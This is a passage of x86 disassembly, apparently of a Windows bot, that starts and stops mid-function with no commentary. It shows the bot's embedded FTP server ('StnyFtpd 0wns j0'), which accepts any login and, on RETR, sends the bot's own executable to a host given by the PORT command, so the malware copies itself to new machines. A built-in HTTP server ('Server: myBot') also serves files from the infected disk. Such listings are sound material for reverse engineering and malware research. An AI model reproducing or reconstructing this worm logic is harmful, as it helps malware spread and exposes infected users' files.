loc_4041FC: ; CODE XREF: sub_404059+1B1�j
cmp [edx], eax
jz short loc_40420C
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
jb short loc_4041FC
loc_40420C: ; CODE XREF: sub_404059+19B�j
; sub_404059+1A5�j
cmp ecx, [ebp+var_228]
jnz short loc_40422A
cmp [ebp+var_228], 40h
jnb short loc_40422A
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_40422A: ; CODE XREF: sub_404059+1B9�j
; sub_404059+1C2�j
cmp eax, [ebp+var_4]
jle short loc_404232
mov [ebp+var_4], eax
loc_404232: ; CODE XREF: sub_404059+1D4�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40463E
; ---------------------------------------------------------------------------
loc_404242: ; CODE XREF: sub_404059+16D�j
push esi
lea eax, [ebp+Dst]
push 64h
push eax
push edi
call ds:dword_41B1D8 ; recv
test eax, eax
jg short loc_4042A9
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_40429D
lea eax, [ebp+var_224]
loc_404269: ; CODE XREF: sub_404059+21A�j
cmp [eax], edi
jz short loc_404277
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_404269
jmp short loc_40429D
; ---------------------------------------------------------------------------
loc_404277: ; CODE XREF: sub_404059+212�j
dec edx
cmp ecx, edx
jnb short loc_404297
lea eax, [ebp+ecx*4+var_224]
loc_404283: ; CODE XREF: sub_404059+23C�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_404283
loc_404297: ; CODE XREF: sub_404059+221�j
dec [ebp+var_228]
loc_40429D: ; CODE XREF: sub_404059+208�j
; sub_404059+21C�j
push edi
call ds:dword_41B1DC ; closesocket
jmp loc_40463E
; ---------------------------------------------------------------------------
loc_4042A9: ; CODE XREF: sub_404059+1FC�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+Dst]
push offset aSS_1 ; "%s %s"
push eax ; Src
call _sscanf
lea eax, [ebp+Str1]
push offset aUser ; "USER"
push eax ; Str1
call _strcmp
add esp, 18h
test eax, eax
jnz short loc_4042ED
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_4042ED: ; CODE XREF: sub_404059+285�j
lea eax, [ebp+Str1]
push offset aPass ; "PASS"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404311
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_404311: ; CODE XREF: sub_404059+2A9�j
lea eax, [ebp+Str1]
push offset aSyst ; "SYST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404335
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_404335: ; CODE XREF: sub_404059+2CD�j
lea eax, [ebp+Str1]
push offset aRest ; "REST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404359
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_404359: ; CODE XREF: sub_404059+2F1�j
lea eax, [ebp+Str1]
push offset off_41FCD4 ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40437D
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_40437D: ; CODE XREF: sub_404059+315�j
lea eax, [ebp+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4043B8
lea eax, [ebp+var_334]
push offset aA_0 ; "A"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4043B8
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_4043B8: ; CODE XREF: sub_404059+339�j
; sub_404059+350�j
lea eax, [ebp+Str1]
push offset aType ; "TYPE"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4043F3
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4043F3
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_404629
; ---------------------------------------------------------------------------
loc_4043F3: ; CODE XREF: sub_404059+374�j
; sub_404059+38B�j
lea eax, [ebp+Str1]
push offset aPasv ; "PASV"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404441
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+Str]
rep movsd
push eax
lea eax, [ebp+Str]
push eax ; Str
movsw
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
loc_404431: ; CODE XREF: sub_404059+427�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
loc_404439: ; CODE XREF: sub_404059+4F7�j
mov edi, [ebp+arg_0]
jmp loc_40462C
; ---------------------------------------------------------------------------
loc_404441: ; CODE XREF: sub_404059+3AF�j
lea eax, [ebp+Str1]
push offset aList ; "LIST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_404482
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax ; Str
movsb
call _strlen
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_404431
; ---------------------------------------------------------------------------
loc_404482: ; CODE XREF: sub_404059+3FD�j
lea eax, [ebp+Str1]
push offset aPort ; "PORT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_404555
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+Dst]
push offset aS_1 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax ; Src
call _sscanf
lea eax, [ebp+Dest]
push eax ; Str
call _atoi
mov edi, eax
lea eax, [ebp+var_2D0]
push eax ; Str
call _atoi
mov [ebp+var_8], eax
push 32h ; Size
lea eax, [ebp+Dest]
push esi ; Val
push eax ; Dst
call _memset
push [ebp+var_8]
lea eax, [ebp+Dest]
push edi
push offset aXX ; "%x%x\n"
push eax ; Dest
call _sprintf
add esp, 44h
lea eax, [ebp+Dest]
push 10h ; Radix
push esi ; EndPtr
push eax ; Str
call _strtoul
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax ; Dest
call _sprintf
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
push [ebp+arg_0]
call ebx ; send
jmp loc_404439
; ---------------------------------------------------------------------------
loc_404555: ; CODE XREF: sub_404059+43E�j
lea eax, [ebp+Str1]
push offset aRetr ; "RETR"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_40460A
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_40465A
pop ecx
cmp eax, 1
pop ecx
jnz short loc_404600
call sub_4046D7
cmp eax, 1
jnz loc_40462C
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_440], esi
jnz short loc_4045F1
push esi ; int
lea eax, [ebp+var_8DC]
push [ebp+var_444] ; int
push eax ; int
lea eax, [ebp+var_4C4]
push eax ; Str
push [ebp+var_6DC] ; int
call sub_405E64
add esp, 14h
loc_4045F1: ; CODE XREF: sub_404059+573�j
lea eax, [ebp+var_8DC]
push eax
call sub_402D63
pop ecx
jmp short loc_40462C
; ---------------------------------------------------------------------------
loc_404600: ; CODE XREF: sub_404059+533�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_404629
; ---------------------------------------------------------------------------
loc_40460A: ; CODE XREF: sub_404059+511�j
lea eax, [ebp+Str1]
push offset aQuit ; "QUIT"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40462C
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_404629: ; CODE XREF: sub_404059+28F�j
; sub_404059+2B3�j ...
push edi
call ebx ; send
loc_40462C: ; CODE XREF: sub_404059+3E3�j
; sub_404059+53D�j ...
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
loc_40463E: ; CODE XREF: sub_404059+164�j
; sub_404059+18D�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40418B
jmp loc_404150
; ---------------------------------------------------------------------------
loc_404650: ; CODE XREF: sub_404059+122�j
push 1
pop eax
loc_404653: ; CODE XREF: sub_404059+D4�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_404059 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40465A proc near ; CODE XREF: sub_404059+529�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_41B1AC ; WSAStartup
push 0
push 1
push 2
call ds:dword_41B1B0 ; socket
push [ebp+arg_0]
mov dword_42E664, eax
mov [ebp+var_10], 2
call ds:dword_41B1A0 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_41B1BC ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_42E664
call ds:dword_41B1A4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4046D2
push dword_42E664
call ds:dword_41B1DC ; closesocket
call ds:dword_41B1A8 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4046D2: ; CODE XREF: sub_40465A+60�j
push 1
pop eax
leave
retn
sub_40465A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046D7 proc near ; CODE XREF: sub_404059+535�p
DstBuf = byte ptr -504h
Filename = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+Filename]
push 104h
push eax
push 0
call ds:dword_41B068 ; GetModuleFileNameA
lea eax, [ebp+Filename]
push offset Mode ; "rb"
push eax ; Filename
call _fopen
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40476E
test byte ptr [esi+0Ch], 10h
jnz short loc_404752
push edi
mov edi, 400h
loc_40471A: ; CODE XREF: sub_4046D7+78�j
push esi ; File
push 1 ; Count
lea eax, [ebp+DstBuf]
push edi ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
lea eax, [ebp+DstBuf]
push 0
push edi
push eax
push dword_42E664
call ds:dword_41B1C8 ; send
push 1
call ds:dword_41B048 ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40471A
pop edi
loc_404752: ; CODE XREF: sub_4046D7+3B�j
push esi ; File
call _fclose
pop ecx
push dword_42E664
call ds:dword_41B1DC ; closesocket
call ds:dword_41B1A8 ; WSACleanup
push 1
pop eax
loc_40476E: ; CODE XREF: sub_4046D7+35�j
pop esi
leave
retn
sub_4046D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404771 proc near ; DATA XREF: sub_4022E3+333�o
; sub_409557+47A2�o
Str = byte ptr -28F0h
Str1 = byte ptr -18F0h
Dest = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_34 = byte ptr -34h
Dst = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
push 1
rep movsd
pop esi
xor ebx, ebx
mov [eax+3ACh], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_14], esi
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_25C]
call dword_42EBB4 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call dword_42EC30 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_404B5C
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov dword_43054C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_42EBE0 ; bind
cmp eax, 0FFFFFFFFh
jz loc_404B5C
push 7FFFFFFFh
push edi
call dword_42EBDC ; listen
cmp eax, 0FFFFFFFFh
jz loc_404B5C
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call dword_42EC4C ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_404B5C
mov ebx, esi
mov [ebp+var_134], edi
mov [ebp+var_138], ebx
mov [ebp+var_8], edi
loc_404848: ; CODE XREF: sub_404771+3E1�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_138]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_8]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call dword_42EB9C ; select
cmp eax, 0FFFFFFFFh
jz loc_404B57
xor esi, esi
mov [ebp+var_4], esi
loc_40487E: ; CODE XREF: sub_404771+3DB�j
lea eax, [ebp+var_6F0]
push eax
push esi
call dword_42EABC ; __WSAFDIsSet
test eax, eax
jz loc_404B42
cmp esi, [ebp+var_C]
jnz short loc_404900
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+var_C]
call dword_42EC44 ; accept
cmp eax, 0FFFFFFFFh
jz loc_404B42
xor ecx, ecx
test ebx, ebx
jbe short loc_4048D2
lea edx, [ebp+var_134]
loc_4048C6: ; CODE XREF: sub_404771+15F�j
cmp [edx], eax
jz short loc_4048D2
inc ecx
add edx, 4
cmp ecx, ebx
jb short loc_4048C6
loc_4048D2: ; CODE XREF: sub_404771+14D�j
; sub_404771+157�j
cmp ecx, ebx
jnz short loc_4048EF
cmp ebx, 40h
jnb short loc_4048EF
mov [ebp+ecx*4+var_134], eax
mov ebx, [ebp+var_138]
inc ebx
mov [ebp+var_138], ebx
loc_4048EF: ; CODE XREF: sub_404771+163�j
; sub_404771+168�j
cmp eax, [ebp+var_8]
jbe loc_404B42
mov [ebp+var_8], eax
jmp loc_404B42
; ---------------------------------------------------------------------------
loc_404900: ; CODE XREF: sub_404771+126�j
mov edi, 1000h
lea eax, [ebp+Str]
push edi ; Size
push 0 ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+Str]
push 0
push edi
push eax
push esi
call dword_42EBCC ; recv
test eax, eax
jg short loc_404993
push esi
call dword_42EC48 ; closesocket
xor ecx, ecx
test ebx, ebx
jbe loc_404B42
lea eax, [ebp+var_134]
loc_404952: ; CODE XREF: sub_404771+1EB�j
cmp [eax], esi
jz short loc_404963
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_404952
jmp loc_404B42
; ---------------------------------------------------------------------------
loc_404963: ; CODE XREF: sub_404771+1E3�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_404987
lea eax, [ebp+ecx*4+var_134]
loc_404971: ; CODE XREF: sub_404771+214�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_404971
loc_404987: ; CODE XREF: sub_404771+1F7�j
dec ebx
mov [ebp+var_138], ebx
jmp loc_404B42
; ---------------------------------------------------------------------------
loc_404993: ; CODE XREF: sub_404771+1C8�j
xor esi, esi
push 104h ; Size
lea eax, [ebp+var_23C]
push esi ; Val
push eax ; Dst
call _memset
lea eax, [ebp+Str]
mov [ebp+arg_0], esi
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jbe loc_404B42
loc_4049C1: ; CODE XREF: sub_404771+309�j
mov eax, [ebp+arg_0]
mov al, [ebp+eax+Str]
cmp al, 0Ah
mov [ebp+esi+Str1], al
jnz loc_404A66
mov esi, offset SubStr ; "GET "
lea eax, [ebp+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_404A3A
lea eax, [ebp+Str1]
push eax ; Str
call _strlen
cmp eax, 5
pop ecx
jbe short loc_404A3A
mov eax, offset Delim ; " "
push eax ; Delim
push eax ; SubStr
lea eax, [ebp+Str1]
push esi ; SubStr
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strstr
pop ecx
pop ecx
push eax ; Str
call _strtok
push eax ; Source
lea eax, [ebp+var_23C]
push eax ; Dest
call _strcpy
add esp, 10h
jmp short loc_404A51
; ---------------------------------------------------------------------------
loc_404A3A: ; CODE XREF: sub_404771+27F�j
; sub_404771+291�j
lea eax, [ebp+Str1]
push offset asc_41FD9C ; "\r\n"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_404A85
loc_404A51: ; CODE XREF: sub_404771+2C7�j
push edi ; Size
lea eax, [ebp+Str1]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_404A66: ; CODE XREF: sub_404771+263�j
inc [ebp+arg_0]
lea eax, [ebp+Str]
push eax ; Str
inc esi
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jb loc_4049C1
jmp loc_404B42
; ---------------------------------------------------------------------------
loc_404A85: ; CODE XREF: sub_404771+2DE�j
xor ecx, ecx
test ebx, ebx
jbe short loc_404ACF
lea eax, [ebp+var_134]
loc_404A91: ; CODE XREF: sub_404771+32D�j
mov esi, [ebp+var_4]
cmp [eax], esi
jz short loc_404AA2
inc ecx
add eax, 4
cmp ecx, ebx
jb short loc_404A91
jmp short loc_404AD2
; ---------------------------------------------------------------------------
loc_404AA2: ; CODE XREF: sub_404771+325�j
lea eax, [ebx-1]
cmp ecx, eax
jnb short loc_404AC6
lea eax, [ebp+ecx*4+var_134]
loc_404AB0: ; CODE XREF: sub_404771+353�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov ebx, [ebp+var_138]
add eax, 4
lea edx, [ebx-1]
cmp ecx, edx
jb short loc_404AB0
loc_404AC6: ; CODE XREF: sub_404771+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_404AD2
; ---------------------------------------------------------------------------
loc_404ACF: ; CODE XREF: sub_404771+318�j
mov esi, [ebp+var_4]
loc_404AD2: ; CODE XREF: sub_404771+32F�j
; sub_404771+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_404B3B
lea eax, [ebp+var_360]
push eax ; Str
call _strlen
mov edi, eax
lea eax, [ebp+var_23C]
push eax ; Str
call _strlen
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_404B3B
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call dword_42EC4C ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_404D4E
add esp, 14h
jmp short loc_404B42
; ---------------------------------------------------------------------------
loc_404B3B: ; CODE XREF: sub_404771+369�j
; sub_404771+38F�j
push esi
call dword_42EC48 ; closesocket
loc_404B42: ; CODE XREF: sub_404771+11D�j
; sub_404771+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_40487E
jmp loc_404848
; ---------------------------------------------------------------------------
loc_404B57: ; CODE XREF: sub_404771+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_404B5C: ; CODE XREF: sub_404771+6A�j
; sub_404771+92�j ...
call dword_42EB50 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_404BA2
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_250] ; int
push eax ; int
lea eax, [ebp+var_5E8]
push eax ; Str
push [ebp+var_5EC] ; int
call sub_405E64
add esp, 14h
loc_404BA2: ; CODE XREF: sub_404771+40C�j
lea eax, [ebp+Dest]
push eax
call sub_402D63
pop ecx
push edi
call dword_42EC48 ; closesocket
push [ebp+var_254]
call sub_411F56
pop ecx
push ebx
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
pop ebx
sub_404771 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404BCC proc near ; DATA XREF: sub_404D4E+246�o
Str = byte ptr -1654h
Source = byte ptr -654h
Dest = byte ptr -550h
var_44C = dword ptr -44Ch
Format = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call __alloca_probe
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+Format]
push eax ; Format
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
lea eax, [ebp+var_2C4]
push eax ; Format
lea eax, [ebp+Source]
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
jz short loc_404C31
push offset aTextHtml ; "text/html"
jmp short loc_404C36
; ---------------------------------------------------------------------------
loc_404C31: ; CODE XREF: sub_404BCC+5C�j
push offset aApplicationOct ; "application/octet-stream"
loc_404C36: ; CODE XREF: sub_404BCC+63�j
lea eax, [ebp+var_9C]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_41B0A0 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_41B09C ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_404CAF
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 24h
jmp short loc_404CD0
; ---------------------------------------------------------------------------
loc_404CAF: ; CODE XREF: sub_404BCC+C4�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+Str]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax ; Dest
call _sprintf
add esp, 28h
loc_404CD0: ; CODE XREF: sub_404BCC+E1�j
lea eax, [ebp+Str]
push edi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+var_44C]
call dword_42EC00 ; send
cmp [ebp+var_A4], edi
jnz short loc_404D10
lea eax, [ebp+Dest]
push eax
push [ebp+var_44C]
call sub_405680
pop ecx
pop ecx
jmp short loc_404D2D
; ---------------------------------------------------------------------------
loc_404D10: ; CODE XREF: sub_404BCC+12C�j
lea eax, [ebp+Source]
push eax ; Source
push edi ; int
push [ebp+var_44C] ; int
lea eax, [ebp+Dest]
push eax ; Str
call sub_404FFE
add esp, 10h
loc_404D2D: ; CODE XREF: sub_404BCC+142�j
push [ebp+var_44C]
call dword_42EC48 ; closesocket
push [ebp+var_B4]
call sub_411F56
pop ecx
push edi
call ds:dword_41B06C ; ExitThread
pop edi
pop esi
sub_404BCC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4E proc near ; CODE XREF: sub_404771+3C0�p
Source = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
Dest = byte ptr -314h
var_211 = byte ptr -211h
Dst = byte ptr -210h
Str = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_404D84
push eax
push offset aS_6 ; "\\%s"
jmp short loc_404D8D
; ---------------------------------------------------------------------------
loc_404D84: ; CODE XREF: sub_404D4E+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_404D8D: ; CODE XREF: sub_404D4E+34�j
lea eax, [ebp+Str]
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Str]
xor esi, esi
xor ebx, ebx
push eax ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_404E28
mov [ebp+arg_8], 2
loc_404DB8: ; CODE XREF: sub_404D4E+D8�j
lea eax, [ebp+Str]
push eax ; Str
call _strlen
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_404DF8
cmp [ebp+esi+Str], 25h
jnz short loc_404DF8
cmp [ebp+esi+var_10B], 32h
jnz short loc_404DF8
cmp [ebp+esi+var_10A], 30h
jnz short loc_404DF8
inc esi
mov [ebp+ebx+Dst], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_404E12
; ---------------------------------------------------------------------------
loc_404DF8: ; CODE XREF: sub_404D4E+7A�j
; sub_404D4E+84�j ...
mov al, [ebp+esi+Str]
cmp al, 2Fh
jnz short loc_404E08
push 5Ch
pop eax
jmp short loc_404E0B
; ---------------------------------------------------------------------------
loc_404E08: ; CODE XREF: sub_404D4E+B3�j
movsx eax, al
loc_404E0B: ; CODE XREF: sub_404D4E+B8�j
mov [ebp+ebx+Dst], al
loc_404E12: ; CODE XREF: sub_404D4E+A8�j
lea eax, [ebp+Str]
inc esi
inc [ebp+arg_8]
push eax ; Str
inc ebx
call _strlen
cmp esi, eax
pop ecx
jb short loc_404DB8
loc_404E28: ; CODE XREF: sub_404D4E+61�j
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push [ebp+arg_4]
push offset aSS ; "%s%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push offset asc_42002C ; "\n"
push eax ; Str
call _strtok
add esp, 18h
lea eax, [ebp+Dest]
push eax
call ds:dword_41B0A8 ; GetFileAttributesA
push 1
cmp eax, 10h
pop esi
jz short loc_404E76
cmp eax, 0FFFFFFFFh
jnz short loc_404E79
push [ebp+arg_0]
jmp short loc_404EF5
; ---------------------------------------------------------------------------
loc_404E76: ; CODE XREF: sub_404D4E+11C�j
mov [ebp+var_4], esi
loc_404E79: ; CODE XREF: sub_404D4E+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_404E86
mov [ebp+var_4], esi
loc_404E86: ; CODE XREF: sub_404D4E+133�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_404F00
cmp [ebp+arg_C], edi
jz short loc_404EF4
lea eax, [ebp+Dest]
push offset asc_420028 ; "*"
push eax ; Dest
call _strcat
lea eax, [ebp+Dest]
push eax ; Format
